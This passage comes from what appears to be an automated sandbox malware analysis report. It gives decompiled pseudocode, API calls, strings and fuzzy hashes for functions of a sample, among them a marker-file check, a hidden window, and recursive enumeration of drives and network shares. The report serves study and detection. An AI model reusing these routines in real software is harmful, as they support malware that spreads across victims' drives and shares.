Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed int _t11;
				signed int _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				void* _t40;
				void* _t41;

				_t28 = _a16;
				if(_t28 == 0) {
					_t10 = E0047D440();
					_t38 = _a12;
					__eflags = _t10;
					_t24 = _a8;
					_t33 = _a4;
					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
					_t41 = _t40 + 0x14;
					__eflags = _t11;
					if(__eflags != 0) {
						L9:
						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
						__eflags = _t14;
					} else {
						do {
							_t15 = _t33;
							_t28 = _t15 + 1;
							do {
								_t26 =  *_t15;
								_t15 = _t15 + 1;
								__eflags = _t26;
							} while (_t26 != 0);
							_t14 = _t15 - _t28;
							__eflags = _t14 - 4;
							if(__eflags < 0) {
								goto L8;
							}
							goto L10;
							L8:
							_push(4);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t16 = E00420E4D();
							E00422408(_t24, _t31, _t33, __eflags);
							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
							_t41 = _t41 + 0x20;
							__eflags = _t19;
						} while (__eflags == 0);
						goto L9;
					}
					L10:
					return _t14;
				} else {
					_t34 = _t28;
					_t27 = _t34 + 1;
					do {
						_t20 =  *_t34;
						_t34 = _t34 + 1;
					} while (_t20 != 0);
					_t36 =  >  ? _a8 : _t34 - _t27;
					E0042D8D0(_a4, _t28, _t36);
					return _t36;
				}
			}

0x00462ff0
0x00462ff7
0x00463027
0x0046302c
0x00463030
0x00463032
0x0046303b
0x0046303f
0x00463048
0x0046304d
0x00463050
0x00463052
0x00463095
0x004630a2
0x004630b3
0x004630b3
0x00463054
0x00463054
0x00463054
0x00463056
0x00463060
0x00463060
0x00463062
0x00463063
0x00463063
0x00463067
0x00463069
0x0046306c
0x00000000
0x00000000
0x00000000
0x0046306e
0x0046306e
0x00463070
0x00463075
0x0046307e
0x00463089
0x0046308e
0x00463091
0x00463091
0x00000000
0x00463054
0x004630b6
0x004630ba
0x00462ff9
0x00462ff9
0x00462ffb
0x00463000
0x00463000
0x00463002
0x00463003
0x0046300d
0x00463018
0x00463023
0x00463023

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463097
phrase is too short, needs to be at least %d chars, xrefs: 00463070
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C500(void* __ecx, void* __edx) {
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t27;

				_t21 = __edx;
				_t4 =  &_v264;
				_t19 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t27 = E004220B6( &_v264, "r");
					__eflags = _t27;
					if(__eflags != 0) {
						_push(_t22);
						_push(2);
						_push(0);
						_push(_t27);
						E0042387F(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t23 = _t10;
						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
						__eflags = _t23;
						if(__eflags == 0) {
							L7:
							_push(_t27);
							E00423A38(_t19, _t23, _t27, __eflags);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t23 - 0x400;
							if(__eflags > 0) {
								goto L7;
							} else {
								E004222F5(_t19, 1, _t23, _t27);
								_push(_t27);
								E00423A38(_t19, _t23, _t27, __eflags);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c500
0x0040c509
0x0040c519
0x0040c51b
0x0040c523
0x0040c539
0x0040c550
0x0040c555
0x0040c557
0x0040c561
0x0040c562
0x0040c564
0x0040c566
0x0040c567
0x0040c56c
0x0040c56d
0x0040c572
0x0040c573
0x0040c575
0x0040c57d
0x0040c57f
0x0040c5a5
0x0040c5a5
0x0040c5a6
0x0040c5ae
0x0040c5b6
0x0040c581
0x0040c581
0x0040c587
0x00000000
0x0040c589
0x0040c58e
0x0040c593
0x0040c594
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c559
0x0040c55a
0x0040c560
0x0040c560
0x0040c525
0x0040c52b
0x0040c52b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA80(struct HINSTANCE__* __ecx) {
				struct HWND__* _t1;
				struct HWND__* _t6;

				 *0x513244 = __ecx;
				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
				_t6 = _t1;
				if(_t6 != 0) {
					ShowWindow(_t6, 0);
					UpdateWindow(_t6);
					 *0x51323c = _t6;
					return 1;
				} else {
					return _t1;
				}
			}

0x0041baa7
0x0041baad
0x0041bab3
0x0041bab7
0x0041babe
0x0041bac5
0x0041bacb
0x0041bad7
0x0041baba
0x0041baba
0x0041baba

APIs

CreateWindowExW.USER32 ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
				char _v8;
				signed int _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				void* _v144;
				struct _NETRESOURCE* _v148;
				signed int _v152;
				void* _v156;
				int _v160;
				int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t103;
				void* _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				void* _t122;
				signed int _t124;
				signed int _t127;
				struct _NETRESOURCE* _t129;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t161;
				intOrPtr* _t164;
				signed int _t167;
				signed int _t168;
				void* _t169;

				_t129 = __ecx;
				_t168 = _t167 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cabd6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				_t169 = _t168 - 0x98;
				_v164 = 0x4000;
				_t164 = __edx;
				_v160 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
					_t122 = GlobalAlloc(0x40, _v164);
					_v144 = _t122;
					while(1) {
						E0042B420(_t122, 0, _v164);
						_t169 = _t169 + 0xc;
						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
						__eflags = _t88;
						if(_t88 != 0) {
							break;
						}
						_v148 = _t88;
						__eflags = _v160 - _t88;
						if(_v160 > _t88) {
							_t124 = _t122 + 0x10;
							__eflags = _t124;
							_v152 = _t124;
							do {
								_v96 = 7;
								_v100 = 0;
								_v116 = 0;
								_v72 = 7;
								_v76 = 0;
								_v92 = 0;
								_v48 = 7;
								_v52 = 0;
								_v68 = 0;
								_v24 = 7;
								_v28 = 0;
								_v44 = 0;
								_v8 = 0;
								_t151 =  *_t124;
								_v132 =  *((intOrPtr*)(_t124 - 0x10));
								_v128 =  *((intOrPtr*)(_t124 - 0xc));
								_v124 =  *((intOrPtr*)(_t124 - 8));
								_v120 =  *(_t124 - 4);
								__eflags = _t151;
								if(_t151 != 0) {
									__eflags =  *_t151;
									if( *_t151 != 0) {
										_t146 = _t151;
										_t161 = _t146 + 2;
										do {
											_t118 =  *_t146;
											_t146 = _t146 + 2;
											__eflags = _t118;
										} while (_t118 != 0);
										_t147 = _t146 - _t161;
										__eflags = _t147;
										_t148 = _t147 >> 1;
									} else {
										_t148 = 0;
									}
									_push(_t148);
									_t129 =  &_v116;
									E00415C10(_t124, _t129, _t161, _t164, _t151);
								}
								_t152 =  *(_t124 + 4);
								__eflags = _t152;
								if(_t152 != 0) {
									__eflags =  *_t152;
									if( *_t152 != 0) {
										_t143 = _t152;
										_t38 = _t143 + 2; // 0x72
										_t161 = _t38;
										do {
											_t116 =  *_t143;
											_t143 = _t143 + 2;
											__eflags = _t116;
										} while (_t116 != 0);
										_t144 = _t143 - _t161;
										__eflags = _t144;
										_t145 = _t144 >> 1;
									} else {
										_t145 = 0;
									}
									_push(_t145);
									_t129 =  &_v92;
									E00415C10(_t124, _t129, _t161, _t164, _t152);
								}
								_t153 =  *(_t124 + 8);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags =  *_t153;
									if( *_t153 != 0) {
										_t140 = _t153;
										_t161 = _t140 + 2;
										do {
											_t114 =  *_t140;
											_t140 = _t140 + 2;
											__eflags = _t114;
										} while (_t114 != 0);
										_t141 = _t140 - _t161;
										__eflags = _t141;
										_t142 = _t141 >> 1;
									} else {
										_t142 = 0;
									}
									_push(_t142);
									_t129 =  &_v68;
									E00415C10(_t124, _t129, _t161, _t164, _t153);
								}
								_t154 =  *(_t124 + 0xc);
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t154;
									if( *_t154 != 0) {
										_t110 = _t154;
										_t161 = _t110 + 2;
										do {
											_t139 =  *_t110;
											_t110 = _t110 + 2;
											__eflags = _t139;
										} while (_t139 != 0);
										_t111 = _t110 - _t161;
										__eflags = _t111;
										_t112 = _t111 >> 1;
									} else {
										_t112 = 0;
									}
									_push(_t112);
									_t129 =  &_v44;
									E00415C10(_t124, _t129, _t161, _t164, _t154);
								}
								_t161 =  *(_t164 + 4);
								__eflags =  &_v132 - _t161;
								if( &_v132 >= _t161) {
									L41:
									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
										_push(_t129);
										E004150C0(_t124, _t164, _t161, _t164);
									}
									_t131 =  *(_t164 + 4);
									_v140 = _t131;
									_v136 = _t131;
									_v8 = 2;
									__eflags = _t131;
									if(__eflags != 0) {
										E00418FD0(_t131, __eflags,  &_v132);
									}
								} else {
									_t103 =  *_t164;
									_t129 =  &_v132;
									__eflags = _t103 - _t129;
									if(_t103 > _t129) {
										goto L41;
									} else {
										_t135 = _t129 - _t103;
										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
											_push(_t135);
											E004150C0(_t127, _t164, _t161, _t164);
										}
										_t136 =  *(_t164 + 4);
										_v136 = _t136;
										_v140 = _t136;
										_t107 = _t127 * 0x70 +  *_t164;
										_v8 = 1;
										__eflags = _t136;
										if(__eflags != 0) {
											E00418FD0(_t136, __eflags, _t107);
										}
										_t124 = _v152;
									}
								}
								_v8 = 0;
								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
								__eflags =  *(_t124 - 4) & 0x00000002;
								if(( *(_t124 - 4) & 0x00000002) != 0) {
									_t71 = _t124 - 0x10; // -16
									E00410BD0(_t71, _t164);
								}
								_v8 = 0xffffffff;
								E00410F20( &_v132);
								_t124 = _t124 + 0x20;
								_t129 = _v148 + 1;
								_v152 = _t124;
								_v148 = _t129;
								__eflags = _t129 - _v160;
							} while (_t129 < _v160);
							_t122 = _v144;
						}
					}
					_t89 = WNetCloseEnum(_v156);
					asm("sbb eax, eax");
					 *[fs:0x0] = _v16;
					_t91 =  ~_t89 + 1;
					__eflags = _t91;
					return _t91;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00410bd0
0x00410bd3
0x00410bd6
0x00410bd8
0x00410be3
0x00410be4
0x00410beb
0x00410bf8
0x00410c08
0x00410c0a
0x00410c1a
0x00410c3f
0x00410c41
0x00410c45
0x00410c4c
0x00410c51
0x00410c63
0x00410c69
0x00410c6b
0x00000000
0x00000000
0x00410c71
0x00410c75
0x00410c79
0x00410c7b
0x00410c7b
0x00410c7e
0x00410c82
0x00410c84
0x00410c8c
0x00410c94
0x00410c99
0x00410ca1
0x00410ca5
0x00410caa
0x00410cb5
0x00410cbc
0x00410cc1
0x00410ccc
0x00410cd3
0x00410cdb
0x00410ce5
0x00410ce7
0x00410cee
0x00410cf5
0x00410cfc
0x00410d00
0x00410d02
0x00410d04
0x00410d08
0x00410d0e
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d19
0x00410d19
0x00410d1e
0x00410d1e
0x00410d20
0x00410d0a
0x00410d0a
0x00410d0a
0x00410d22
0x00410d24
0x00410d28
0x00410d28
0x00410d2d
0x00410d30
0x00410d32
0x00410d34
0x00410d38
0x00410d3e
0x00410d40
0x00410d40
0x00410d43
0x00410d43
0x00410d46
0x00410d49
0x00410d49
0x00410d4e
0x00410d4e
0x00410d50
0x00410d3a
0x00410d3a
0x00410d3a
0x00410d52
0x00410d54
0x00410d58
0x00410d58
0x00410d5d
0x00410d60
0x00410d62
0x00410d64
0x00410d68
0x00410d6e
0x00410d70
0x00410d73
0x00410d73
0x00410d76
0x00410d79
0x00410d79
0x00410d7e
0x00410d7e
0x00410d80
0x00410d6a
0x00410d6a
0x00410d6a
0x00410d82
0x00410d84
0x00410d88
0x00410d88
0x00410d8d
0x00410d90
0x00410d92
0x00410d94
0x00410d98
0x00410d9e
0x00410da0
0x00410da3
0x00410da3
0x00410da6
0x00410da9
0x00410da9
0x00410dae
0x00410dae
0x00410db0
0x00410d9a
0x00410d9a
0x00410d9a
0x00410db2
0x00410db4
0x00410dbb
0x00410dbb
0x00410dc0
0x00410dc7
0x00410dc9
0x00410e1f
0x00410e1f
0x00410e22
0x00410e24
0x00410e27
0x00410e27
0x00410e2c
0x00410e2f
0x00410e33
0x00410e37
0x00410e3f
0x00410e41
0x00410e48
0x00410e48
0x00410dcb
0x00410dcb
0x00410dcd
0x00410dd1
0x00410dd3
0x00000000
0x00410dd5
0x00410dd5
0x00410de8
0x00410dea
0x00410ded
0x00410def
0x00410df2
0x00410df2
0x00410df7
0x00410dfd
0x00410e01
0x00410e05
0x00410e07
0x00410e0f
0x00410e11
0x00410e14
0x00410e14
0x00410e19
0x00410e19
0x00410dd3
0x00410e4d
0x00410e55
0x00410e59
0x00410e60
0x00410e64
0x00410e67
0x00410e67
0x00410e70
0x00410e7b
0x00410e84
0x00410e87
0x00410e88
0x00410e8c
0x00410e90
0x00410e90
0x00410e9a
0x00410e9a
0x00410c79
0x00410ea7
0x00410eb7
0x00410eb9
0x00410ec1
0x00410ec1
0x00410ec6
0x00410c1c
0x00410c25
0x00410c32
0x00410c32

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00410A50(char __ecx) {
				signed int _v16;
				char _v28;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				char _v76;
				unsigned int _v80;
				char _v84;
				unsigned int _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t35;
				int _t39;
				int _t40;
				int _t45;
				void* _t48;
				signed int _t52;
				char* _t63;
				signed int _t74;
				signed int _t75;
				void* _t76;
				char* _t77;

				_t75 = _t74 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cab90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_t76 = _t75 - 0x48;
				_push(_t72);
				_push(_t70);
				_v76 = __ecx;
				_t35 = GetLogicalDrives();
				_v80 = _t35;
				_t52 = 0;
				do {
					if((_t35 >> _t52 & 0x00000001) == 0) {
						goto L11;
					}
					_push(1);
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					E004156D0(_t52,  &_v68, _t70, " ");
					_v16 = 0;
					_t10 = _t52 + 0x41; // 0x41
					_push(2);
					_t59 =  >=  ? _v76 :  &_v76;
					 *( >=  ? _v76 :  &_v76) = _t10;
					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
					_t39 = SetErrorMode(1);
					_t70 = _t39;
					_t62 =  >=  ? _v84 :  &_v84;
					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
					_t72 = _t40;
					SetErrorMode(_t39);
					if(_t40 != 0) {
						_t44 =  >=  ? _v76 :  &_v76;
						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
							_t77 = _t76 - 0x18;
							_v89 = 0;
							_t63 = _t77;
							_push(0xffffffff);
							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t63 + 0x10)) = 0;
							 *_t63 = 0;
							E00413FF0(_t52, _t63,  &_v76, 0);
							_t48 = E00412900( &_v64, _v101);
							_t76 = _t77 + 0x18;
							_v28 = 1;
							E00413580(_t52, _v96, _t48);
							if(_v48 >= 8) {
								L00422587(_v56);
								_t76 = _t76 + 4;
							}
						}
					}
					_v16 = 0xffffffff;
					if(_v56 >= 0x10) {
						L00422587(_v76);
						_t76 = _t76 + 4;
					}
					_t35 = _v88;
					L11:
					_t52 = _t52 + 1;
				} while (_t52 < 0x1a);
				 *[fs:0x0] = _v16;
				return _t35;
			}

0x00410a53
0x00410a56
0x00410a58
0x00410a63
0x00410a64
0x00410a6b
0x00410a6f
0x00410a70
0x00410a71
0x00410a75
0x00410a7b
0x00410a7f
0x00410a81
0x00410a8a
0x00000000
0x00000000
0x00410a90
0x00410a9b
0x00410aa3
0x00410aab
0x00410ab0
0x00410ab5
0x00410ac6
0x00410ac9
0x00410acb
0x00410ad5
0x00410adb
0x00410ae2
0x00410af1
0x00410af3
0x00410af9
0x00410b00
0x00410b02
0x00410b0a
0x00410b15
0x00410b1b
0x00410b24
0x00410b30
0x00410b33
0x00410b38
0x00410b3e
0x00410b42
0x00410b49
0x00410b51
0x00410b54
0x00410b61
0x00410b66
0x00410b6e
0x00410b73
0x00410b7d
0x00410b83
0x00410b88
0x00410b88
0x00410b7d
0x00410b24
0x00410b8b
0x00410b98
0x00410b9e
0x00410ba3
0x00410ba3
0x00410ba6
0x00410baa
0x00410baa
0x00410bab
0x00410bba
0x00410bc5

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x510ab0 - _t7;
								if(__eflags == 0) {
									_t9 = E00425208(__eflags);
									 *_t9 = E00425261(GetLastError());
									goto L17;
								} else {
									__eflags = E0042793D(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00425208(__eflags);
										 *_t12 = E00425261(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0042793D(_t6, _t31);
						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
						goto L12;
					} else {
						E00420BED(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00420C62(__ebx, __edx, __edi, _a8);
				}
			}

0x0043b706
0x0043b714
0x0043b717
0x0043b719
0x0043b728
0x0043b75b
0x0043b75b
0x0043b75e
0x00000000
0x00000000
0x0043b72b
0x0043b72d
0x0043b72f
0x0043b72f
0x0043b72f
0x0043b73c
0x0043b742
0x0043b744
0x0043b746
0x0043b7a6
0x0043b7a6
0x0043b748
0x0043b748
0x0043b74e
0x0043b790
0x0043b7a4
0x00000000
0x0043b750
0x0043b757
0x0043b759
0x0043b778
0x0043b78c
0x0043b772
0x0043b772
0x0043b772
0x00000000
0x00000000
0x00000000
0x0043b759
0x0043b74e
0x00000000
0x0043b774
0x0043b761
0x0043b76c
0x00000000
0x0043b71b
0x0043b71e
0x0043b724
0x0043b724
0x0043b775
0x0043b777
0x0043b708
0x0043b712
0x0043b712

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
